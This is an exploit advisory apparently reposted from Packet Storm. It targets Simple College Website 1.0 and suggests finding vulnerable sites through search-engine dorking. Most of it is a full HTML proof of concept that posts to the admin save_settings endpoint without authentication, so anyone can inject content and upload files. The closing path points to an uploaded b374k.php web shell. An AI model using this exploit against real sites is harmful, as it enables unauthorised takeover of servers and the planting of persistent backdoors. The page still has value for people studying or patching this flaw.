Share
## https://sploitus.com/exploit?id=PACKETSTORM:180360
=============================================================================================================================================  
| # Title : Simple College Website 1.0 WYSIWYG Settings Management Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 129.0.1 (64 bits) |  
| # Vendor : https://www.sourcecodester.com/php/14548/simple-college-website-using-htmlphpmysqli-source-code.html |  
=============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google Or Other Search Enggine.  
  
[+] Part 01 : about-us.php  
  
[+] This payload injects code of your choice into the database via Froala is a WYSIWYG editor V: 4.2.1 .   
  
[+] Line 109 : Send the form data using fetch API (Set your target url)  
  
[+] save payload as poc.html  
  
[+] payload :   
  
  
<!DOCTYPE html>  
<html lang="en">  
  
<head>  
<meta charset="UTF-8">  
<meta name="viewport" content="width=device-width, initial-scale=1.0">  
<title>Settings Management</title>  
<!-- Froala Editor CSS -->  
<link href="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/css/froala_editor.pkgd.min.css" rel="stylesheet">  
<!-- Bootstrap CSS -->  
<link href="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css" rel="stylesheet">  
<style>  
/* Custom Styles */  
#cimg {  
max-width: 100%;  
height: auto;  
}  
#preloader2 {  
position: fixed;  
top: 0;  
left: 0;  
width: 100%;  
height: 100%;  
background: rgba(0, 0, 0, 0.5);  
display: flex;  
justify-content: center;  
align-items: center;  
z-index: 9999;  
}  
.form-group {  
margin-bottom: 1rem;  
}  
.form-group label {  
display: block;  
margin-bottom: .5rem;  
}  
.form-group input, .form-group textarea {  
width: 100%;  
padding: .5rem;  
box-sizing: border-box;  
}  
</style>  
</head>  
  
<body>  
<div class="container">  
<form id="manage-settings" method="post" enctype="multipart/form-data">  
<div class="form-group">  
<label for="name"> Name</label>  
<input type="text" id="name" name="name" required>  
</div>  
<div class="form-group">  
<label for="email">Email</label>  
<input type="email" id="email" name="email" required>  
</div>  
<div class="form-group">  
<label for="contact">Contact</label>  
<input type="tel" id="contact" name="contact" required>  
  
<div class="form-group">  
<label for="about">About Content</label>  
<textarea class="text-jqte" id="about" name="about_us"></textarea>  
</div>  
<div class="form-group">  
<label for="img">Cover Image</label>  
<input type="file" id="img" name="img" accept="image/*" onchange="displayImg(this, this)">  
<img id="cimg" src="" alt="Selected Image Preview">  
</div>  
<button type="submit" class="btn btn-primary">Save Settings</button>  
</form>  
</div>  
  
  
<div class="modal fade" id="viewer_modal" role='dialog'>  
<div class="modal-dialog modal-md" role="document">  
<div class="modal-content">  
<button type="button" class="btn-close" data-dismiss="modal"><span class="fa fa-times"></span></button>  
<img src="" alt="">  
</div>  
</div>  
</div>  
  
<!-- jQuery -->  
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js"></script>  
<!-- Froala Editor JS -->  
<script src="https://cdnjs.cloudflare.com/ajax/libs/froala-editor/4.0.1/js/froala_editor.pkgd.min.js"></script>  
<!-- Bootstrap JS (for modals) -->  
<script src="https://stackpath.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.bundle.min.js"></script>  
  
<script>  
function displayImg(input, _this) {  
if (input.files && input.files[0]) {  
var reader = new FileReader();  
reader.onload = function (e) {  
$('#cimg').attr('src', e.target.result);  
}  
reader.readAsDataURL(input.files[0]);  
}  
}  
  
$(document).ready(function () {  
const editorInstance = new FroalaEditor('.text-jqte');  
});  
  
$('#manage-settings').submit(function (e) {  
e.preventDefault();  
start_load();  
$.ajax({  
url: 'http://127.0.0.1/college_website/admin/ajax.php?action=save_settings',  
data: new FormData($(this)[0]),  
cache: false,  
contentType: false,  
processData: false,  
method: 'POST',  
type: 'POST',  
error: err => {  
console.log(err);  
},  
success: function (resp) {  
if (resp == 1) {  
alert_toast('Data successfully saved.', 'success');  
setTimeout(function () {  
location.reload();  
}, 1000);  
}  
}  
});  
});  
  
window.start_load = function () {  
$('body').prepend('<div id="preloader2"></div>');  
}  
  
window.end_load = function () {  
$('#preloader2').fadeOut('fast', function () {  
$(this).remove();  
});  
}  
  
window.viewer_modal = function ($src = '') {  
start_load();  
var t = $src.split('.');  
t = t[1];  
if (t == 'mp4') {  
var view = $("<video src='" + $src + "' controls autoplay></video>");  
} else {  
var view = $("<img src='" + $src + "' />");  
}  
$('#viewer_modal .modal-content video,#viewer_modal .modal-content img').remove();  
$('#viewer_modal .modal-content').append(view);  
$('#viewer_modal').modal({  
show: true,  
backdrop: 'static',  
keyboard: false,  
focus: true  
});  
end_load();  
}  
  
window.uni_modal = function ($title = '', $url = '', $size = "") {  
start_load();  
$.ajax({  
url: $url,  
error: err => {  
console.log(err);  
alert("An error occurred");  
},  
success: function (resp) {  
if (resp) {  
$('#uni_modal .modal-title').html($title);  
$('#uni_modal .modal-body').html(resp);  
if ($size != '') {  
$('#uni_modal .modal-dialog').addClass($size);  
} else {  
$('#uni_modal .modal-dialog').removeAttr("class").addClass("modal-dialog modal-md");  
}  
$('#uni_modal').modal({  
show: true,  
backdrop: 'static',  
keyboard: false,  
focus: true  
});  
end_load();  
}  
}  
});  
}  
  
window._conf = function ($msg = '', $func = '', $params = []) {  
$('#confirm_modal #confirm').attr('onclick', $func + "(" + $params.join(',') + ")");  
$('#confirm_modal .modal-body').html($msg);  
$('#confirm_modal').modal('show');  
}  
  
window.alert_toast = function ($msg = 'TEST', $bg = 'success') {  
$('#alert_toast').removeClass('bg-success bg-danger bg-info bg-warning');  
  
if ($bg == 'success')  
$('#alert_toast').addClass('bg-success');  
if ($bg == 'danger')  
$('#alert_toast').addClass('bg-danger');  
if ($bg == 'info')  
$('#alert_toast').addClass('bg-info');  
if ($bg == 'warning')  
$('#alert_toast').addClass('bg-warning');  
  
$('#alert_toast .toast-body').html($msg);  
$('#alert_toast').toast({ delay: 3000 }).toast('show');  
}  
</script>  
</body>  
  
</html>  
  
[+] Path : background: url(admin/assets/uploads/1724235960_b374k.php);  
  
  
Greetings to :============================================================  
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr |  
==========================================================================